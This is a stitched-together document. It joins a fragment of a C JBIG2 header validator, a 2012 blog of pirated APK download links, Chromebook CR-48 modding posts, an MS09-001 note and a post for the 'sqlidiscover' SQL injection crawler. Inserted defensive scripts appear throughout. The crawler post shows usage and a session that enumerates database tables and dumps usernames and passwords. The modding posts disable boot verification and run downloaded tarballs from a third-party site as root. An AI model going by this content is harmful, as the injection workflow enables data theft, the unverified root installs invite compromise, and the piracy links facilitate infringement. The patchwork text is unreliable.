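    JB2_BAD_REFCOUNT,  /* more referred-to segments than could exist */
    JB2_BAD_PAGE,      /* page association exceeds MAX_PAGES */
    JB2_BAD_LENGTH     /* data length exceeds the bytes that follow */
};

struct jb2_seg_hdr {
    uint32_t number;        /* segment number */
    uint8_t  type;          /* flags bits 0-5 */
    int      page_assoc_4;  /* flags bit 6: 4-byte page association */
    uint32_t ref_count;     /* referred-to segment count */
    uint32_t page;          /* page association */
    uint32_t data_len;      /* segment data length */
    size_t   header_len;    /* bytes consumed by the header */
};

static uint32_t rd32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Parse one JBIG2 segment header (T.88 section 7.2) from buf[0..len) and
 * bounds-check every field before anything downstream indexes with it. */
enum jb2_status jb2_parse_segment_header(const uint8_t *buf, size_t len,
                                         struct jb2_seg_hdr *h)
{
    size_t pos;
    if (len < 6)
        return JB2_TRUNCATED;
    h->number = rd32(buf);
    pos = 4;
    uint8_t flags = buf[pos++];
    h->type = flags & 0x3f;
    h->page_assoc_4 = (flags & 0x40) != 0;

    /* Referred-to segments: count in the top 3 bits (short form), or the
     * long form (4-byte count plus retain bits) when those bits are 7. */
    uint32_t count = buf[pos] >> 5;
    if (count == 7) {
        if (len - pos < 4)
            return JB2_TRUNCATED;
        count = rd32(buf + pos) & 0x1fffffffu;
        pos += 4;
        size_t retain_bytes = ((size_t)count + 8) / 8;  /* ceil((count+1)/8) */
        if (len - pos < retain_bytes)
            return JB2_TRUNCATED;
        pos += retain_bytes;
    } else {
        pos += 1;
    }
    if (count > h->number)           /* may only refer to lower-numbered segments */
        return JB2_BAD_REFCOUNT;
    h->ref_count = count;
    size_t ref_size = h->number <= 256 ? 1 : (h->number <= 65536 ? 2 : 4);
    if (len - pos < (size_t)count * ref_size)
        return JB2_TRUNCATED;
    pos += (size_t)count * ref_size;

    /* Page association: the field the post's crafted streams control. */
    size_t pa_size = h->page_assoc_4 ? 4 : 1;
    if (len - pos < pa_size)
        return JB2_TRUNCATED;
    h->page = pa_size == 4 ? rd32(buf + pos) : buf[pos];
    pos += pa_size;
    if (h->page > MAX_PAGES)
        return JB2_BAD_PAGE;

    if (len - pos < 4)
        return JB2_TRUNCATED;
    h->data_len = rd32(buf + pos);
    pos += 4;
    h->header_len = pos;
    /* 0xffffffff means "unknown length" and is left to the region decoder. */
    if (h->data_len != 0xffffffffu && h->data_len > len - pos)
        return JB2_BAD_LENGTH;
    return JB2_OK;
}

/* Verdict-only wrapper. */
enum jb2_status jb2_check(const uint8_t *buf, size_t len)
{
    struct jb2_seg_hdr h;
    return jb2_parse_segment_header(buf, len, &h);
}

/* Header length of an accepted header, 0 if rejected. */
size_t jb2_header_len(const uint8_t *buf, size_t len)
{
    struct jb2_seg_hdr h;
    return jb2_parse_segment_header(buf, len, &h) == JB2_OK ? h.header_len : 0;
}

/* The two stream prefixes quoted in the post (bytes after "stream\n"). */
const uint8_t POST_STREAM_1[] = {0x00,0x00,0x00,0x01, 0x40, 0x00, 0x00,0x33,0x33,0x33};
const uint8_t POST_STREAM_2[] = {0x00,0x00,0x00,0x01, 0x40, 0x00, 0x00,0x66,0x66,0x66,
                                 0x13,0x00,0x00,0x07, 0x2c, 0x00, 0x00, 0x09};
/* Constructed well-formed header: segment 0, page-info type, 1-byte page
 * association = 1, two data bytes. */
const uint8_t GOOD_STREAM[] = {0x00,0x00,0x00,0x00, 0x30, 0x00, 0x01,
                               0x00,0x00,0x00,0x02, 0xaa,0xbb};
/* Constructed header declaring 16 data bytes but carrying one. */
const uint8_t LONG_STREAM[] = {0x00,0x00,0x00,0x00, 0x30, 0x00, 0x01,
                               0x00,0x00,0x00,0x10, 0xaa};

int main(void)
{
    printf("post stream 1: status %d\n", jb2_check(POST_STREAM_1, sizeof POST_STREAM_1));
    printf("post stream 2: status %d\n", jb2_check(POST_STREAM_2, sizeof POST_STREAM_2));
    printf("constructed good header: status %d, header length %zu\n",
           jb2_check(GOOD_STREAM, sizeof GOOD_STREAM),
           jb2_header_len(GOOD_STREAM, sizeof GOOD_STREAM));
    printf("constructed over-long header: status %d\n",
           jb2_check(LONG_STREAM, sizeof LONG_STREAM));
    return 0;
}
```

Both of the post's streams are rejected at the page-association check (status 3), before any length or index derived from the header can be used; the constructed good header parses with an 11-byte header, and the over-long one fails the data-length check.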


Thursday, 27 September 2012

Pixlr-o-matic 2.1.2 APK


Pixlr-o-matic v2.1.2 APK Free 4shared Mediafire Download Android

Requirements: Android 2.1 or higher
Overview: You can add fun retro effects to your photos in a snap and transform your photos into cool looking vintage images. Editing is as easy as one, two, three with Pixlr-o-matic to add effects, overlays and borders. So many options to choose from, there are more than 5,000,000 possible finishes to make your photos look spectacular!


Features:
✓Color overlays help you adjust the mood – amplify the tone, cool it down, or add surreal shades
✓Lighting effects add drama, sparkle or a grunge look
✓Finish off your photo process with the right frame – pick a border style that fits you
✓Want it all in a single swipe? Try the randomizer and we’ll select an effect, overlay, and border for you.
✓No camera required! Select a photo from your gallery and start applying effects. If your device has a camera, you can also snap a new picture from within the app
✓Share your vintage image directly with your friends through Facebook or imm.io
✓Export your finished image back to your gallery. Images can be saved in high resolution, depending on the resolution of the original image

Download here

http://rapidgator.net/file/22883274/Pixlr-o-matic_2.1.2_app_.APk.rar.html

Direct Download

http://1hostclick.com/vgx6c3uum6ko/Pixlr-o-matic_2.1.2_app_.APk.rar.html

Download link

Instructions for mediafire Free Links before these

Demo video on how to install

Notes

**You need to be somewhat versed in Linux for any of these mods.

**You need to have full shell access to use any of my tidbits here, whether this is by developer mode (which is what I did), or some other method you come up with.
While I could go and dual-boot the cr-48 into Ubuntu, I chose to leave Chrome OS in place and modify it to make it more shell friendly.

**You also need to make the root partition writable, and turn off boot verification.

sudo /usr/share/vboot/bin/make_dev_ssd --remove_rootfs_verification
sudo reboot

Then:

sudo mount -o remount,rw /
sudo mount -o remount,exec /mnt/stateful_partition

You will also need to re-run these commands after every reboot, so you may want to stick them in a shell script.
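Since those two remounts have to be redone after each reboot, here is a small script for it. It is an added example, not the original author's, and it assumes the Linux mount table at /proc/mounts; the "apply" argument is this script's own convention. Rather than remounting blindly it checks the current options first, which needs two details of /proc/mounts: ro/rw is recorded explicitly but exec only ever shows up as the absence of noexec, and when a mount point is listed twice the last entry is the effective one. Bear in mind that after --remove_rootfs_verification, Verified Boot no longer checks the root filesystem, so anything written there as root stays there unverified.

```shell
#!/bin/sh
# Added example, not from the original post: re-apply the two remounts
# after a reboot, but only when /proc/mounts shows they are still needed.
# MOUNTS_FILE can be pointed at a saved copy of /proc/mounts for testing.
MOUNTS_FILE="${MOUNTS_FILE:-/proc/mounts}"

# has_opt MOUNTPOINT OPTION [MOUNTS_TEXT]
# Exit 0 when the mount at MOUNTPOINT carries OPTION in its option list.
# If a mount point appears more than once (e.g. "rootfs" and the real root
# device both on /), the last entry is the effective one, so each match
# resets the result before scanning its options.
has_opt() {
    mp="$1"; opt="$2"
    if [ $# -ge 3 ]; then text="$3"; else text=$(cat "$MOUNTS_FILE"); fi
    printf '%s\n' "$text" | awk -v mp="$mp" -v opt="$opt" '
        $2 == mp {
            found = 0
            n = split($4, o, ",")
            for (i = 1; i <= n; i++) if (o[i] == opt) found = 1
        }
        END { exit found ? 0 : 1 }'
}

# needs_remount MOUNTPOINT rw|exec [MOUNTS_TEXT]
# Exit 0 when the remount is still required. /proc/mounts never lists "exec"
# itself, only "noexec", so each target is tested via its blocking option.
needs_remount() {
    case "$2" in
        rw)   bad=ro ;;
        exec) bad=noexec ;;
        *)    echo "unknown target: $2" >&2; return 2 ;;
    esac
    if [ $# -ge 3 ]; then has_opt "$1" "$bad" "$3"; else has_opt "$1" "$bad"; fi
}

# The two remounts from the post, skipping any that are already in place.
apply_remounts() {
    if needs_remount / rw; then
        sudo mount -o remount,rw /
    fi
    if needs_remount /mnt/stateful_partition exec; then
        sudo mount -o remount,exec /mnt/stateful_partition
    fi
}

# Run as:  sh remount.sh apply   ("apply" is this script's own convention)
if [ "${1:-}" = "apply" ]; then
    apply_remounts
fi
```

Sourcing the file instead of running it gives you has_opt and needs_remount as shell functions, which is handy for a quick "is the stateful partition still noexec?" check from an interactive shell.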


I'd like to get a full build system on it, but I'm not sure if that's possible yet.
I'm also working on getting java and acrobat support into the browser.

Installing the Nano text editor

I've discovered that the stock cr-48 setup can use binary packages from Arch Linux. This is how to install the Nano editor from arch. I'll provide two different methods, depending on if you want to pull the package from the repository yourself, or use my repackaged binary.
**You need to follow the instructions in the Notes post first, to make the partitions writeable
* Installing from an Arch repo. You'll need to download the package to a linux machine of your choosing. You can find the package at: http://www.archlinux.org/packages/core/i686/nano/
The package is compressed as a .tar.xz, which eluded me for the longest time. To extract the package use XZ Utils on Linux. The syntax is:

xz -d filename

Once you have decompressed the file from its .xz container, you will be left with a .tar file, which the cr-48 has tools to open.
Now we need to get the file to the CR-48. If you have a ssh server on your linux box, we can use sftp to retrieve the file:

sftp user@host

If you don't have an ssh server, you can upload the file to some public webspace, and wget the file from the cr-48.
Once the file is on your cr-48, you can tar -xvf it, and copy the nano exec from the bin directory into /usr/bin (which is in the path) and nano should run flawlessly.


** If you don't want to go through all that work, open up a shell on the cr-48, and wget http://www.calliesfarm.com/chromeos/nano.tar.gz then, tar -zxvf nano.tar.gz and move the nano exec to /usr/bin

Installing Locate

**You need to follow the instructions in the Notes post first, to make the partitions writeable
I'm only going to give you the simple method for this one, as it has many files that need to be put in different directories
Open up a shell on the cr-48, and

sudo su
wget http://www.calliesfarm.com/chromeos/locate.tar.gz
mv locate.tar.gz /
cd /
tar -zxvf locate.tar.gz
rm -rf locate.tar.gz

after it's installed, you should be able to run

updatedb

to populate the database, and it should add a cron job to auto update the db daily
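Both the nano and the locate shortcuts above fetch a tarball as root and unpack it straight into the system. The script below is an added example (not part of the original post) that does the same fetch-and-install for either package but refuses to unpack anything whose SHA-256 does not match a value you obtained from a trusted source; it stages into a temporary directory and copies only the single binary you asked for. The URL and hash in the usage comment are placeholders, since the post publishes no checksums, and sha256sum from coreutils is assumed.

```shell
#!/bin/sh
# Added example, not from the original post: install one binary out of a
# downloaded tarball only after its SHA-256 matches a value you trust.
# The URL and hash shown in the usage comment are placeholders.

# verify_sha256 FILE EXPECTED  -> exit 0 if FILE hashes to EXPECTED
verify_sha256() {
    actual=$(sha256sum "$1" | awk '{print $1}')
    [ "$actual" = "$2" ]
}

# install_from_tarball ARCHIVE EXPECTED_SHA256 MEMBER DESTDIR
# Unpacks ARCHIVE (gzip'd tar) into a fresh temp dir only if the hash
# matches, then copies MEMBER (path inside the archive, e.g. bin/nano) to
# DESTDIR with mode 0755. Nothing is written to DESTDIR on a mismatch.
install_from_tarball() {
    archive="$1"; expected="$2"; member="$3"; destdir="$4"
    if ! verify_sha256 "$archive" "$expected"; then
        echo "refusing to install: SHA-256 mismatch for $archive" >&2
        return 1
    fi
    stage=$(mktemp -d) || return 1
    if ! tar -xzf "$archive" -C "$stage" "$member"; then
        rm -rf "$stage"; return 1
    fi
    mkdir -p "$destdir"
    cp "$stage/$member" "$destdir/" && chmod 0755 "$destdir/$(basename "$member")"
    rc=$?
    rm -rf "$stage"
    return $rc
}

# Stand-alone use (placeholders, not values from the post):
#   sh install_verified.sh https://example.invalid/nano.tar.gz <sha256-from-trusted-source> bin/nano /usr/bin
if [ $# -eq 4 ]; then
    tmp=$(mktemp) && wget -q -O "$tmp" "$1" && install_from_tarball "$tmp" "$2" "$3" "$4"
    [ -n "$tmp" ] && rm -f "$tmp"
fi
```

The same function covers the locate package: call it once per file you want, each with the path inside the archive, instead of untarring over / as root.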

Installing a VNC Viewer

WooHoo! Finally managed to wrangle a VNC Viewer onto this thing, I'm psyched.

There's an app in the webstore for VNC to a remote server, but that's not really suited for logging in to another machine on the local network.

I've coaxed java to work locally, and am able to run a java vnc client applet.

Still can't get the java plugin to work in browser however.

Detailed directions to follow in a bit

26 Eylül 2012 Çarşamba

Installing a VNC Viewer, part 2

Installing VNCViewer
**You need to follow the instructions in the Notes post first, to make the partitions writeable

Open up a shell on the cr-48, and

sudo su
mkdir /mnt/stateful_partition/opt (if you haven't already)
cd /mnt/stateful_partition/opt
wget http://www.calliesfarm.com/chromeos/java.tar.gz
wget http://www.calliesfarm.com/chromeos/vncviewer.tar.gz
tar -zxvf java.tar.gz
tar -zxvf vncviewer.tar.gz
rm -rf java.tar.gz vncviewer.tar.gz
ln -s /usr/bin/java jre1.6.0_23/bin/java
mv vncviewer/vncviewer /usr/bin

after it's installed, you should be able to run

vncviewer

However, since there are no close-window widgets, there are two ways to disconnect: either navigate to the vnc server icon once connected and tell it to disconnect you, or kill it from the terminal.
Also, in theory, you should be able to link the java plugin to the browser plugins directory, and get java working in browser, however it doesn't work for me, and I'm not sure why at the moment.

It's got shortcomings, but it's a start.

Making /mnt/stateful_partition exec friendly

Finally found out how to make the /mnt/stateful_partition exec permission persistent.
open up a shell: CTRL-ALT-T

shell
sudo su

open up /sbin/chromeos_startup - i'll use nano, as I have a tutorial for installing it

nano /sbin/chromeos_startup

Now, when scrolling around in nano, the screen will not refresh properly when scrolling up/down pages, but we can press CTRL-L to make it redraw the screen.
While in nano, CTRL-C will give you your current cursor position. We want to edit lines 51, 58, and 67.
Remove noexec, from each of those lines
The line should then look something like .... -o nodev,nosuid .....
You can also remove the ,nosuid if you'll be wanting to install any SUID programs on the stateful partition.

Save the file by pressing CTRL-X and answering Y and pressing enter for the filename.
Reboot, and your stateful partition should be remounted with the correct options from this point forward.
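Rather than relying on fixed line numbers in nano, the edit can be scripted. The function below is an added example, not from the original post: it takes an option name and strips it from every -o option list read on stdin, leaving spacing and the rest of each line untouched, and substitutes "defaults" if a list would otherwise be left empty. Do a dry run against a copy first and keep the original file around; the diff usage in the comment is the intended way to check what would change.

```shell
#!/bin/sh
# Added example, not from the original post: remove one mount option from
# every "-o <list>" (or "-o<list>") on stdin, touching nothing else.
#
# Dry run:  strip_mount_opt noexec < /sbin/chromeos_startup | diff /sbin/chromeos_startup -
# Apply:    strip_mount_opt noexec < /sbin/chromeos_startup > /tmp/new && cp /tmp/new /sbin/chromeos_startup

# strip_mount_opt OPTION  (filter: stdin -> stdout)
strip_mount_opt() {
    awk -v opt="$1" '
    {
        line = $0; out = ""
        # Walk each " -o <list>" occurrence left to right. A leading blank is
        # required so that "-options"-style words are not mistaken for -o.
        while (match(line, /[ \t]-o[ \t]*[^ \t]+/)) {
            seg  = substr(line, RSTART, RLENGTH)
            list = seg; sub(/^[ \t]-o[ \t]*/, "", list)        # the comma list itself
            flag = substr(seg, 1, length(seg) - length(list))  # " -o " part, spacing kept
            n = split(list, parts, ","); kept = ""
            for (j = 1; j <= n; j++)
                if (parts[j] != opt) kept = kept (kept == "" ? "" : ",") parts[j]
            if (kept == "") kept = "defaults"   # never leave "-o" with an empty list
            out  = out substr(line, 1, RSTART - 1) flag kept
            line = substr(line, RSTART + RLENGTH)
        }
        print out line
    }'
}

# Stand-alone: strip the option named in $1 from stdin.
if [ $# -eq 1 ]; then
    strip_mount_opt "$1"
fi
```

Only whole option names are compared, so removing noexec leaves nodev and nosuid alone; if you also want nosuid gone, run the filter a second time with that name.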

Ambient Light Sensor

It seems the features will never cease. The CR48's got an ambient light sensor in it as well, located just to the right of the webcam's eye.
If your display brightness isn't cranked all the way up, and you come into an area of increased light (or presumably walk outside) the display will brighten up for you.
Don't believe me? Turn the screen brightness down in a dim room, and hit the webcam with a flashlight!

About: Pages

For a while now, we've known we could go to the address about:version or about:flags and get more information or different settings.

I've found there's an in-depth listing of these pages at about:about

List of About pages

  • about:appcache-internals
  • about:blob-internals
  • about:view-http-cache
  • about:credits
  • about:dns
  • about:flags
  • about:gpu
  • about:histograms
  • about:memory
  • about:net-internals
  • about:plugins
  • about:stats
  • about:sync
  • about:tasks
  • about:tcmalloc
  • about:terms
  • about:version
  • about:linux-proxy-config
  • about:sandbox
  • about:network
  • about:os-credits

For Debug

The following pages are for debugging purposes only. Because they crash or hang the renderer, they're not linked directly; you can type them into the address bar if you need them.
  • about:crash
  • about:hang
  • about:shorthang
  • about:gpucrash
  • about:gpuhang

Be warned however: about:sync has been crashing my browser, although it works fine on my other PC.

Proxy Settings

One of my biggest gripes so far with the CR48 is waiting for it to detect proxy settings any time the wifi reconnects. Every time it comes out of suspend, it takes way too long to discover I don't (and never did) use a proxy, before it will let me do anything online.

I was unable to find a place in the settings where I could change this, but I stumbled across chrome://settings/proxy which lets you default it to direct connection!

Now my chromebook works a lot faster coming out of standby and getting back on the net!

25 Eylül 2012 Salı

CarDust 1.1 APK


CarDust v1.1 APK Free 4shared Mediafire Download Android

Requirements: Android 2.2 and up
Overview: Leave 'em in the dust!


From desolate wastelands to abandoned post-industrial suburbia, tire-burning dust eaters come together to risk life and limb in the CarDust challenge. Glory, riches and frequent oil changes await you on these inhospitable tracks!

androidzoom.com: Entertaining and challenging. Recommendable. 4/5 (Great App)
Compete with these hard-boiled veterans in multiple locations to win the CarDust Tournament. Test your mettle in six battered, bizarre, age-old vehicles trying to cross the finish line in front of all others. Employ unusual, highly experimental (and probably illegal) technologies to gain an edge on your opponents! Race against the ghosts of the past - either yours or those of other racers (through OpenFeint).

This package includes, among others:
- five peculiar vehicles remotely resembling cars (plus an unlockable sixth vehicle!)
- five richly featured 3D tracks - desolate desert, abandoned factory, outback town, ruined dockyard and mountain ridge (plus an unlockable sixth track!)
- never-seen-before time warp and position switching powerups
- two casual race modes: QuickRace with up to 5 AI opponents, and TimeTrial enabling you to race your own “ghost” - or compete against world's best driver
- Big Tournament mode: race on four different tracks and score the most points to unlock extra content
- over 30 achievements waiting to be unlocked (including a very special secret achievement!)
- full OpenFeint integration with leaderboards and TimeTrial “ghost competition” with the best player currently out there!


Download here

http://1hostclick.com/2mjwmfie6kjl/CarDust_v1.1.apk.html

Direct Download

http://rapidgator.net/file/22940756/CarDust_v1.1.apk.html

Download link

Instructions for mediafire Free Links before these

Demo video on how to install

Grabatron 1.5.4 APK


Grabatron v1.5.4 APK Free 4shared Mediafire Download Android

Requirements: Android v2.1+
Overview: Grabatron is the latest massively addicting game from the makers of Hungry Shark.

Crazy high replay value, Future Games Of London has delivered one of the best action games in the AppStore- App Shack 4.5/5
This game makes me laugh the whole time I am playing. - AndroidRundown.com 10/10 PERFECT!

** Massive JUNE Update **
+ 5 Ships: Scout, Mustax, Hornet, Talonator and XenoClaw!
+ 5 Landing Zones!
+ Ship Upgrades: Speed, Shield, Crystal Attraction!
+ Extra Lives!

Grabatron is the latest massively addictive game from the makers of Hungry Shark.

Take control of a UFO with a retractable claw and destroy the puny humans!
Terrorise them anyway you like: Toss them, crush them, abduct them - it's up to you.

Explore a huge and varied environment with hours of action packed gameplay.

* Beautiful Graphics
* Realistic Physics
* Huge world to explore
* Over 30 different missions
* Both Tilt and Touch controls available

Grabatron - where being evil has never been so much fun...



NOTE:
HTC Desire, Nexus One, Galaxy Ace users: Pause and resume the game if you experience slowdown issues 5-10mins into gameplay.

Recent changes:
v1.5.4: Special weapon - Alien Homing Missiles!
+ Earn Crystals by watching video ads!
+ special something for Independence Day!

Download here

http://rapidapk.com/3vy8y0gerbmm

Direct Download

http://rapidgator.net/file/22929929

Download link

Instructions for mediafire Free Links before these

Demo video on how to install

Critter Quitter: Bugs Revenge 1.0.1 APK


Critter Quitter: Bugs Revenge v1.0.1 Free 4shared Mediafire Download Android

Requirements: Android 2.2 and up
Overview: Critter Quitter - Stop an invasion of ravenous bugs! A "killer" Android game.




Call them berserker bugs, call them insatiable insects, call them pernicious pests, call them whatever you want but DON'T call them to dinner! These critters are on the loose and about to eat you out of house and home!

These critters are clever and cunning and will use every trick to get at your delicious pizzas, cakes, pies and assorted goodies. The only way to stop these critters is to bash, squish, and squash them into oblivion.

But you won’t have to do it alone. Each critter kill earns you juice and you can trade that juice for an assortment or wacky and wonderful, but dastardly and deadly weapons. Use these weapons or “power-ups” to defeat these invasive critters. And with such a wide variety of power-ups at your disposal, no two plays are ever the same.

Show the world what an efficient critter killing machine you truly are! Critter Quitter proudly uses OpenFeint, so you can unlock fun achievements, shoot for the top of the global Leaderboards, and challenge your friends - all while racking up points.

Critter Quitter offers you addictive gameplay, spectacular graphics, and two game modes!

FEATURES

★ 54 "Killer" Levels, increasing in difficulty. First 18 are free to play!
★ 20 Species of Crazy Carnivorous Critters
★ 14 Ingenious Power-ups for Clever Critter Killing
★ Combo System to Maximize Your Score
★ Easy to Learn, Tough to Master - Great for ALL Ages and Experience Levels
★ Slick Animations and Immersive Sounds Effects
★ "Go for Broke" Survival Mode for Ultimate Challenge



Download here

http://turbobit.net/zqtzwjaktoib.html

Direct Download

http://www.rodfile.com/rq7tbnw7jjlg/Critter_Quitter.apk.html

Download link

Instructions for mediafire Free Links before these

Demo video on how to install

Omega Hero 1.1 APK


Omega Hero v1.1 APK Free 4shared Mediafire Download Android

Requirements: Android 2.0.1 and up
Overview: Play as a protector of the innocent, born to defend small businesses from large corporate takeovers in a side scrolling 3D brawler.


In a city that never sweeps, you take control of Omega Hero in a mission to clean the streets of the rotten Dust Bunnies and their evil employer Mr. Boss.

★ Easy to learn, exciting to play and challenging to master! ★

★★★★★This game has a ton of humor and even more fun.
-Chad Coup, Arcani Pictures, LLC

★★★★★There's finally a mobile beat 'em up that's actually fun.
-Kyle Davis, Integrity Financial Group

★★★★★Old school gameplay with amazing graphics.-Justin Murphy, Full Sail University



Features
✓ 6 unique acts
✓ Endless mode for unlimited play
✓ Free content updates
✓ Original soundtrack by Shinobi MC
✓ Fully voice acted
✓ Hard mode for the ultimate challenge
✓ Game Center achievements and leader boards

Download here

http://1hostclick.com/rvzv0d2tzgi1/Omega_Hero_v1.1.apk.html

Direct Download

http://rapidgator.net/file/22920010/Omega_Hero_v1.1.apk.html

Download link

Instructions for mediafire Free Links before these

Demo video on how to install

Men In Black 3 :1.0.3 AdFree APK


Men In Black 3 :v1.0.3 AdFree APK Free 4shared Mediafire Download Android

Requirements: Android v2.1+
Overview: The official game of Men in Black 3, putting players in charge of the agency.

CREATE AND MANAGE YOUR OWN MIB AGENCY
• Train your agents and assign them to missions
• Access a wide range of MIB weapons and gadgets like the Neuralyzer, the Deatomizer and the infamous Noisy Cricket.
• Build dozens of different rooms to upgrade your weapons and develop your agency.

TAKE DOWN ENEMIES IN 1969 & 2012 NEW YORK
• Travel in time to fight aliens in different areas of New York including Brooklyn, Times Square, and Central Park
• Utilize your agent’s futuristic weapons and equipment
• Meet dozens of aliens faithfully inspired by the Men in Black universe

ASK YOUR FRIENDS TO JOIN THE AGENCY
• Invite your friends from GL LIVE! & Facebook to play
• Ask for your friends’ help during fights to defeat powerful aliens
• Visit your friends’ headquarters and get rewarded for lending a hand


MEN IN BLACK™ 3, in theaters May 25th, 2012. In Men in Black 3, Agents J and K are back... in time. J has seen some inexplicable things in his 15 years with the Men in Black, but nothing, not even aliens, perplexes him as much as his wry, reticent partner. But when K's life and the fate of the planet are at stake, Agent J will have to travel back in time to put things right. J discovers that there are secrets to the universe that K never told him -- secrets that will reveal themselves as he teams up with the young Agent K to save his partner, the agency, and the future of humankind.


Latest version: 1.0.3 (for Android version 2.1 and higher, supports App2SD)

Download here

http://rapidgator.net/file/22900422

Direct Download

http://rapidapk.com/l7223sqypqr6

Download link

Instructions for mediafire Free Links before these

Demo video on how to install

23 Eylül 2012 Pazar

MS09-001 followup - Just DoS bugs?

It appears that the 3 vulnerabilities covered in MS09-001 do not lead to code execution. We spent the last few days really tearing into these and could not produce any controllable conditions that would lead to code execution. The ANDX bug had already been determined to be simply a DoS, but it was thought that the NTTRANS/TRANS2 bugs could lead to code execution. Upon further review, we found that in the case of both bugs, a buffer underflow could be caused in which a buffer would be allocated with not enough memory and would later be zeroed out in the SMB transaction-request processing functions. It was here that the now corrupted system heap pool would crash in srv.sys during a pool bugcheck. The crashes can actually be triggered a number of ways, leading to a similar crash, just with different origins. We're still looking into possible avenues of traversing the MPX functionality, but as for now... code execution does not look possible.

I think the group will try to spend some time this week looking at other possibly vulnerable functionality in SMB. Seems like there is a lot of room for error.

-xort

MsSQL SQL Injection Data Crawling - Tool Updated

We've recently updated the functionality of the sqlidiscover.pl tool used for enumerating sql databases, tables, columns and data fields. We've included support for adding a custom cookie to your request.

http://blacksecurity.org/tools/42/sqlidiscover___MsSQL_SQL_Injection_Data_Crawler/124.html



sqli_discover_tables v0.2 26Jan2009 kaneda 'n phildo, upgraded by redsand.
usage: sqlidiscover [-G|-P] [-v] [-b] [-phostname:port] [-cCookieName:CookieValue] [-avarname1=value1,...,varname2=value2] [-ivarname] URL

-G - use GET method
-P - use POST method
-a - additional variables i.e. -aaction=create,cid=12
-b - bypass SQL, OS version and current user check
-i - variable to screw with i.e. -itxtPassword
-v - verbose
URL - http://vuln/file.asp
-p - use http/https proxy, format hostname:port i.e. -pmyproxy.com:8080
-c - use browser cookie, format name:value i.e. -cASPSESSIONID:LCACPKILKFN



Here's an actual example:

jinxy ~ # perl sqlidiscover.pl -c ASPSESSIONIDSSSTRCDB:KCMLJILCJGPBJELANCFHCNGL -v -G -iProductID http://www.example.com/catalog/view.asp
sqli_discover_tables v0.2 26Jan2009 kaneda 'n phildo, upgraded by redsand.
[*] HTTP cookie set to ASPSESSIONIDSSSTRCDB=KCMLJILCJGPBJELANCFHCNGL
[*] URL to process: http://www.example.com/catalog/view.asp
[*] Abusing 'ProductID'...

[+] OS version: Windows NT 5.2 (Build 3790: Service Pack 2)
[+] Current user: dbo


unknown_db.test> help
sqliinjection interactive session help

exit / quit - leave sqli
discover databases / discover dbs - discover all databases on system
discover tables - discover all tables on system
discover columns - discover all columns in current table
select db/database [name] - change context to database [name]
select table [name] - change context to table [name]
fetch n,..,x - fetch data from columns n, etc. (i.e. fetch username,password).

------------------------------------------------------------

unknown_db.test> select database demo
Changing context to demo.test

demo.test> select table Users

Changing context to demo.Users

demo.Users> discover columns

[*] Enumerating columns for table Users
[+] Column search: found: (0) AccountNumber
[+] Column search: found: (1) Address
[+] Column search: found: (2) Email
[+] Column search: found: (3) Name
[+] Column search: found: (4) Password
[+] Column search: found: (5) Phone
[+] Column search: found: (6) Username
[+] Column search finished, 6 found


demo.Users> fetch Username, Password, Name
[+] Using columns Username, Password, Name
[*] Retrieving information for table demo.Users
[+] 3 columns selected for data retrieval
| Username | Password | Name
| admin | demo | Demo
| superadmin | master | Master Admin
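Seen from the other side of the wire, a crawler like this leaves its enumeration probes in the web server's logs. The script below is an added example, not part of the original post or of the sqlidiscover tool: it decodes the common URL escapes in each log line and flags the ones that carry typical MSSQL probing markers. The log lines, the IIS-style field layout and the marker list are all constructed for this example and should be tuned to your own environment.

```shell
#!/bin/sh
# Added example, not part of the original post or the sqlidiscover tool:
# a triage filter that flags web-server log lines whose query string carries
# MSSQL injection / schema-enumeration markers.
# SAMPLE_LOG and the marker list are constructed for this example.

# Normalise the most common URL encodings so one pattern matches either form.
# Deliberately small: a first-pass filter, not a full URL decoder.
url_decode_lite() {
    sed -e 's/+/ /g' -e 's/%20/ /g' -e "s/%27/'/g" -e 's/%28/(/g' \
        -e 's/%29/)/g' -e 's/%3[Dd]/=/g' -e 's/%2[Cc]/,/g' -e 's/%2[Dd]/-/g'
}

# Markers typical of MSSQL probing and enumeration (assumed list; tune it).
# Matched case-insensitively against the decoded line.
SQLI_RE="'[[:space:]]*(and|or|having|;|--)"
SQLI_RE="$SQLI_RE|[[:space:]]and[[:space:]]+[0-9]+=[0-9]+"
SQLI_RE="$SQLI_RE|@@version|sysobjects|syscolumns|information_schema"
SQLI_RE="$SQLI_RE|waitfor[[:space:]]+delay|xp_cmdshell|convert\(int"

# flag_sqli: read log lines on stdin, print the original line for each hit.
flag_sqli() {
    while IFS= read -r line; do
        decoded=$(printf '%s' "$line" | url_decode_lite)
        if printf '%s\n' "$decoded" | grep -Eiq "$SQLI_RE"; then
            printf '%s\n' "$line"
        fi
    done
}

# count_flagged: number of flagged lines on stdin (useful for an alert threshold).
count_flagged() {
    flag_sqli | wc -l | tr -d ' '
}

# Constructed IIS W3C-style lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG='2009-01-26 10:00:01 192.0.2.10 GET /catalog/view.asp ProductID=12 200
2009-01-26 10:00:07 192.0.2.10 GET /catalog/search.asp q=handy+tools 200
2009-01-26 10:00:12 192.0.2.10 GET /catalog/view.asp ProductID=12%27%20and%201=1-- 200
2009-01-26 10:00:13 192.0.2.10 GET /catalog/view.asp ProductID=12%20union%20select%20name%20from%20sysobjects-- 500
2009-01-26 10:00:20 192.0.2.10 GET /catalog/view.asp ProductID=12;waitfor+delay+%270:0:5%27-- 200'

# Stand-alone run: print the flagged sample lines and a count.
if [ "${1:-}" = "scan" ]; then
    printf '%s\n' "$SAMPLE_LOG" | flag_sqli
    printf 'flagged: %s\n' "$(printf '%s\n' "$SAMPLE_LOG" | count_flagged)"
fi
```

Because the same client hits one parameter of one page with a burst of these within seconds (exactly what the verbose session above shows from the attacker's side), grouping flagged lines by c-ip and cs-uri-stem per minute is the natural next step for an alert.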

Blinded w/ VNC Viewer vulns.

